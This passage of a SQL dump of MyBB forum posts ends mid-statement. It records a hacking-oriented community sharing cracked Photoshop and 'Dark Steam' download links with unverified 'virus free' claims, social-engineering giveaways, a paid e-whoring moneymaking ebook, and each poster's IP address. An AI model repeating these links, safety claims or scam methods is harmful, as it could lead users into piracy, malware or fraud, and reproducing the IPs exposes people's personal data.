'82', 'iTzIpod', '1347636203', 'Enjoy them ^-^ Download: http://www.mediafire.com/?df0eba2d4q79r3c', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79f0a5f59b9dfb846564d024e978c954', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1939', '425', '0', '61', 'Huge SEing Giveaway [50+]', '0', '82', 'iTzIpod', '1347636332', 'Hey Unique. Hope you are enjoying these giveaways! :D Download: http://www.mediafire.com/?al9z1ml8bo9u8m2 Note: This is safe to download.', '24.212.197.164', '416597412', '1', '0', '82', '1347717569', '1', '3bf62fef74d7f12393dc2fb514af6b4f', '0', '1347717569'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1940', '426', '0', '30', '[100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347636446', '[spoiler=Download][url=http://www.mediafire.com/?g8qa22aqmftitlq]Click Here[/url][/spoiler] [spoiler=Virus Scan][url=http://www.screensnapz.com/v/?i=ZYGhilVSZ.png]Click Here[/url][/spoiler]', '24.212.197.164', '416597412', '1', '0', '82', '1347718085', '1', 'b589550428d42afda1954f973425d8a7', '0', '1347718085'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1941', '427', '0', '61', 'Photoshop CS6 Extended 64 Bit', '0', '82', 'iTzIpod', '1347636588', 'Photoshop CS6 Extended 64-Bit Free Download Download link: http://www.mediafire.com/?va8k4oj5j9327o0 Enjoy! :D - iTzIpod Note: This is safe to download.', '24.212.197.164', '416597412', '1', '0', '82', '1347717496', '1', '57b58e2b1350615ae437f52447dd5532', '0', '1347717496'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1942', '428', '0', '74', 'Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347636703', '[align=center]Ever wanted Free Steam Games? Download Dark Steam and get all games that are on Steam for free! Original site: http://www.darksteam.info Download: https://dl.dropbox.com/s/pwqiy7jq25y41i3/4.1.5.exe Virus Scan (2 false positives): https://www.virustotal.com/url/fb89d8416617c30464cfb8f36706c9a5c69f927b3446d68994f7f460088d8aaf/analysis/1347635270/ Proof it works: [img]http://zz9cap.com/img/ee83d1b0ffb389aaec36.png[/img][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1347636754', '1', 'cc61d8cc1b01aa4164da906a83606f55', '0', '1347636754'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1943', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1347643245', 'I don\'t think I have 25+ posts, but I read a ton of stuff on LH sooo you think I could have 4?', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '2f66c68e1ba5d36961089ab2bab47171', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1944', '193', '873', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '100', '??zg???g????61', '1347643310', '[quote=\'iTzIpod\' pid=\'873\' dateline=\'1345867189\'] [quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\'] the Network Security download is locked with a password... --...-- [/quote] Oh? I\'ll see if I can crack it. Or ask for the password :p Thanks! any luck?', '96.237.179.21', '1626190613', '1', '0', '100', '1347643371', '1', '3f1c5434a965a66355b5964ae97bda8f', '0', '1347643371'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1945', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '112', '??????Z', '1347643621', 'Just read your Ebook, really nice intro for beginners. nice work :)', '92.23.147.171', '1545049003', '1', '0', '0', '0', '1', '808dbcdc8deb35f92b9ba616b4eb9e79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1946', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '1', 't3h jok3r', '1347646344', 'I thought I fixed the time limit. I will work on this when I get back home. At hovercatz, we do not allow two posts by the same poster under a certain time to avoid double posting but we will take this under consideration. Leaving this open, I will let you know when its done so you guys can give it a check.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ac0087e839f095667c944cdd5c8edc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1947', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347646678', 'Reloadzer you never fail to impress me with your GFX skills. I like the second one more.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b0e558bc845205f6fbc3b1c714de4de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1948', '18', '49', '2', 'RE: star test', '0', '1', 't3h jok3r', '1347647046', 'Neither am I, I found this theme and it was a pretty good free theme just it had a lot of bugs, I fixed the problems and due to these problems only some people use this theme so. I picked this theme because its dark, unique and idk I know staff didn\'t get any update lol but trust out of all the choices the current one is the best.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '34c5c6a3026a418cf8e9ce9f0d10dfeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1949', '429', '0', '2', 'testing similes', '0', '1', 't3h jok3r', '1347647241', ':) :shocked: :( :whistle: ;) :shy: :umm: :hehe: :P :thinking: :D :opps: :uh yeah: :cool: :roflol: :lol: :mhm: :grrr: :angel: :?: Testing smilies', '72.231.24.165', '1223104677', '1', '0', '1', '1347666859', '1', 'e4a21df22ad2e2cf3979ee7bcd27be7a', '0', '1347666859'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1950', '429', '1949', '2', 'RE: testing similes', '0', '1', 't3h jok3r', '1347647280', 'And I found an error.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0cdcdcda4fa10cac941a6f2004bd0853', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1951', '430', '0', '9', '? ?[3$]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '53', 'sirchamp', '1347647305', '[size=xx-small]Notes: Im posting this thread here because there is no Marketplace Section [size=xx-large][color=#FF0000]New Price!! Only 3 Dollars [/size] [img]http://i.imgur.com/o6jPW.jpg[/img] [color=#FF0000][size=large]Template: Title: How to make money Online Author: Sirchamp Pages: 13 Description: This book contains 2 Methods on how to make money online Payment Options: Paypal, Pm me for Liberty Reserve Copies Available: Unlimited Resale Rights: [size=x-large]Normally 20$[/size]. This can vary. Pm me if you want to resale Price: 3$ [/size][/color] [color=#FFD700][size=large]Payment Proof[/size][/color] [IMG]http://i.imgur.com/WtKOb.jpg[/IMG] [color=#32CD32][size=xx-large]Press the link below to autobuy the E-Book[/size][/color] http://uploadnsell.com/buy/nzjs3d[/color][/size] [color=#32CD32][size=x-large] Review[/size][/color](of Happy Forums, HF, Hack*cough*forum) [quote]Quality of information: 3.5/5 The quality of the information in the ebook is good. One method I knew, the other I did not. The first method is e-whoring, be aware of that. The second one however is something else, I did not know something like that could be produced. The second method is great & a private one. It will work. Ease: 4/5 This first method can be applied, required you the have time. It takes a little time like 2-3 hours to get started, but once done, you have to work after 2-3 days. The second method however only takes 5-15 minutes & earns you within an hour or two. Layout: 3/5 Layout was ok. After all, it is the info that matters. Nothing to dull, nothing to bright Pros: Thorougly explained Legal, Whitehat Semi-Autopilot Pictures & videos Cons: First method is public Requires patience Note: This is my personal review of this ebook. Regards- Dkc379(member of nearly reviewers) [/quote] [color=#32CD32][size=x-large]Review[/size][/color][color=#32CD32](of LH)[/color] [quote] Ebook review by Jok3r Quality of Information (3/5) Well-explained ebook. This ebook contains two different monetizing techniques, in fact we even have a sub-forum for one of the technique. His ebook explains even contains a video on how to do one of the method and you can get full support on LH on the technique so it\'s safe to buy this ebook. The second method is kinda unique but seems high rewarding. Ease (5/5) Both methods are easy, just require some patience. The first method is public and kinda saturated but you can earn shit loads of money. I would recommend 15+ to look forward to buy this ebook. Layout (5/5) Font and text size are easy to see and read, contains steps including pictures, includes author email for inquiries, white background but short yet well-explained ebook. This is a review of the ebook, we do not endorse or vouch for this ebook in any way. This my opinion and may vary with others.[/quote]', '188.155.56.90', '-1130678182', '1', '0', '53', '1348151179', '1', '74db47bc6fce1e6d93bfef9effbc3683', '0', '1348151179'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1954', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '62', 'R?????zo?', '1347649248', 'thanks, I try to do my best :P hopefully OP likes it aswell', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b9735784ceb3b532cabb1abb9cca246b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1952', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '1', 't3h jok3r', '1347647525', 'That\'s not a vouch, its an review by the reviewers group. Pm me, NXK or apathy a vouch copy if you would like q vouch or are willing to send out a vouch copy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '98d2ef123bf06fd903d683e9294e8b70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1953', '337', '1587', '15', 'RE: [HOT] Syslogger LATEST VERSION [HOT]', '0', '100', '??zg???g????61', '1347649070', 'Well this WAS posted in Unique\'s section... 0_0', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'b6e37aa1dfdc29132f5763eba264bfca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1955', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '62', 'R?????zo?', '1347649625', 'thanks for sharing it might come useful. I got 2 questions though: can you play online games with original steam users aka non cracked servers? are the games usually updated, like when some game is released on steam is also released there? never the less, nice share.', '94.132.244.168', '1585771688', '1', '0', '62', '1347649649', '1', '2da089f2a35746480446bd302eb5ccfa', '0', '1347649649'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1956', '302', '1405', '53', 'RE: Java DoS Script', '0', '53', 'sirchamp', '1347649945', 'Hahah it will print\" fuck yo cpu\" on your screen. Fake tool. Look at this \"vir=(vir+10)*10/1000000;\" hahaha.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f5f98d87d6e668a025053d5ee1d39879', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1957', '431', '0', '61', '[Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1347649952', 'I will be doing some GFX work for free for Unique members only, all you have to do is just post what you want using the template below: [code]Size: Colour Scheme: Render/Image: Text: Anything else:[/code] I can do pretty much everything from avatars, signatures, banners. Just not thread designs since I\'m kinda short on time lately. Post here with your request, and I will make it as soon as possible.', '94.132.244.168', '1585771688', '1', '0', '82', '1347931450', '1', '2bc65279ae767b8cef07e8303d1edd09', '0', '1347931450'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1958', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '53', 'sirchamp', '1347650028', 'ReUpload Thanks. File blocked for Violation', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '69b0585040e61a8261384f2989632884', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1959', '426', '1958', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347650630', '[quote=\'sirchamp\' pid=\'1958\' dateline=\'1347650028\'] ReUpload Thanks. File blocked for Violation [/quote] Alright. I will do it in a few.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c027d08fc51f82e6b312b0caee48e02b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1960', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347650771', '[quote=\'R?????zo?\' pid=\'1957\' dateline=\'1347649952\'] I will be doing some GFX work for free for Unique members only, all you have to do is just post what you want using the template below: [code]Size: Colour Scheme: Render/Image: Text: Anything else:[/code] I can do pretty much everything from avatars, signatures, banners. Just not thread designs since I\'m kinda short on time lately. Post here with your request, and I will make it as soon as possible. [/quote] 1. Thanks for contributing to Unique. =] But I\'m fine for now. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0cca9321f440270f4b58b2ab26563bb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1961', '193', '1944', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1347650871', '[quote=\'GRONgamer61\' pid=\'1944\' dateline=\'1347643310\'] [quote=\'iTzIpod\' pid=\'873\' dateline=\'1345867189\'] [quote=\'GRONgamer61\' pid=\'720\' dateline=\'1345774110\'] the Network Security download is locked with a password... --...-- [/quote] Oh? I\'ll see if I can crack it. Or ask for the password :p Thanks! any luck? [/quote] I tried to crack it. But didn\'t get any luck. And I would try to ask for the password but I am banned on HF. (IP Banned)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a3a63994ee531b8dc1c66abddd4b47d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1962', '418', '1945', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1347650940', '[quote=\'??????Z\' pid=\'1945\' dateline=\'1347643621\'] Just read your Ebook, really nice intro for beginners. nice work :) [/quote] Thanks. I hope it will help a majority of the users that try to SE.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3d489c961c922fbc6a9ba7c740bfd20', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1963', '428', '1955', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347651095', '[quote=\'R?????zo?\' pid=\'1955\' dateline=\'1347649625\'] thanks for sharing it might come useful. I got 2 questions though: [b]can you play online games with original steam users aka non cracked servers?[/b] [u]are the games usually updated, like when some game is released on steam is also released there? [/u] never the less, nice share. [/quote] You\'re welcome Reloadzor. =] @Bolded Text, That, I am not sure. But I would appreciate if you try it and post feedback? @Underlinded Text, Yes. They update the games. Be sure to check out www.darksteam.info =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc604dc0c6878b6a38729474bbe580a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1964', '421', '1929', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '20', 'JakeUS', '1347651552', 'What do you mean by waiting time?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '986b83851bbbdff60f60aeaadc580b42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1965', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1347651586', 'Editted the thread. 5+ Posts and at least 1 day registered.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6bacc1ad9042ae19c7351bd6175eeaa6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1966', '421', '1964', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '82', 'iTzIpod', '1347651813', '[quote=\'JakeUS\' pid=\'1964\' dateline=\'1347651552\'] What do you mean by waiting time? [/quote] There is that post thing. That makes you wait a couple seconds to post. I just call it \"waiting time\". Sorry for the mix up.', '24.212.197.164', '416597412', '1', '0', '82', '1347651841', '1', '6451df8dea5b13ed0adcaf67aa750a91', '0', '1347651841'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1967', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '53', 'sirchamp', '1347653342', 'Asking for rep is forbidden. LQ ..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4f0e74defb12397f84322c770663ed65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1968', '432', '0', '61', '145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347654427', 'Enjoy. Image: [img]http://icap.me/i/HUlIFDars2.png[/img] Download: https://dl.dropbox.com/u/57903257/145%20ebooks.zip', '24.212.197.164', '416597412', '1', '0', '82', '1347664814', '1', 'd85040e75062bd83de22b9185617ea5b', '0', '1347664814'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1969', '433', '0', '61', '2000+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347654511', 'Hey guys! This is a thread giving away 2k+ eBooks. I don\'t know what they are about though. Please leave a thank you down below! [url=http://hightechmodz.com/E-Books.html]Link to 2k E-books[/url] Enjoy guys!', '24.212.197.164', '416597412', '1', '0', '82', '1347664573', '1', '04fbb5b31377ce9a460736b532fb5ccf', '0', '1347664573'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1970', '345', '1954', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347654994', '[quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\'] thanks, I try to do my best :P hopefully OP likes it aswell [/quote] It\'s nice it\'s just not something I\'m really into. Ill wait and see if anyone else comes up with anything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3028d04077f10bcbc4cb3468c8e016dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1971', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347662568', 'NXK what font did you use for your Userbars?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '534d1eb7dfafebcffb8882724cd39a03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1972', '345', '1970', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347663555', '[quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\'] [quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\'] thanks, I try to do my best :P hopefully OP likes it aswell [/quote] It\'s nice it\'s just not something I\'m really into. Ill wait and see if anyone else comes up with anything. [/quote] Umm are you saying it because of the font?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1e25b4216dcb86444100b4a30ad25b29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1973', '345', '1972', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347663688', '[quote=\'t3h jok3r\' pid=\'1972\' dateline=\'1347663555\'] [quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\'] [quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\'] thanks, I try to do my best :P hopefully OP likes it aswell [/quote] It\'s nice it\'s just not something I\'m really into. Ill wait and see if anyone else comes up with anything. [/quote] Umm are you saying it because of the font? [/quote] In my opinion, it\'s the font I only don\'t like. Although it might look good with the font NXK used.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eec7f56d16ca3f431f93efd089ab538', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1974', '419', '1926', '49', 'RE: [Suggestion] Signature Characters + for + Members', '0', '1', 't3h jok3r', '1347663878', 'There\'s not plugin I believe that can do this. I will do a research, if I can\'t figure it out then I guess the suggestion gets declined.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'df9c6c34ad90e0c34e08661eebbea3cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1975', '421', '1929', '49', 'RE: [Suggestion] Upgraded Members get no waiting time', '0', '1', 't3h jok3r', '1347664130', 'Waiting time is the right word, some may call it post flood or thread flood. I have lowered it, but I can\'t remove it because I can\'t let some members go on spamming with posts. They need a break.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5b9cd1d4759509163a2646d80add8cfa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1976', '345', '1973', '63', 'RE: Need userbar! [Gamers]', '0', '1', 't3h jok3r', '1347664279', '[quote=\'iTzIpod\' pid=\'1973\' dateline=\'1347663688\'] [quote=\'t3h jok3r\' pid=\'1972\' dateline=\'1347663555\'] [quote=\'NXK\' pid=\'1970\' dateline=\'1347654994\'] [quote=\'R?????zo?\' pid=\'1954\' dateline=\'1347649248\'] thanks, I try to do my best :P hopefully OP likes it aswell [/quote] It\'s nice it\'s just not something I\'m really into. Ill wait and see if anyone else comes up with anything. [/quote] Umm are you saying it because of the font? [/quote] In my opinion, it\'s the font I only don\'t like. Although it might look good with the font NXK used. [/quote] Well if he changes the size and doesn\'t use a border then it might look better.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7e2d8dbaa21b0ea4262bd7ea05749838', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1977', '433', '1969', '61', 'RE: eBooks Giveaway', '0', '1', 't3h jok3r', '1347664320', 'Why not take a screenshot of some of them?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'befa6db5015bbc736d596092f2c2946b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1978', '432', '1968', '61', 'RE: eBooks Giveaway', '0', '1', 't3h jok3r', '1347664343', 'It would be better to change the title, because you have the same title for two threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c95237baed105f6503a5b93105c89674', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, 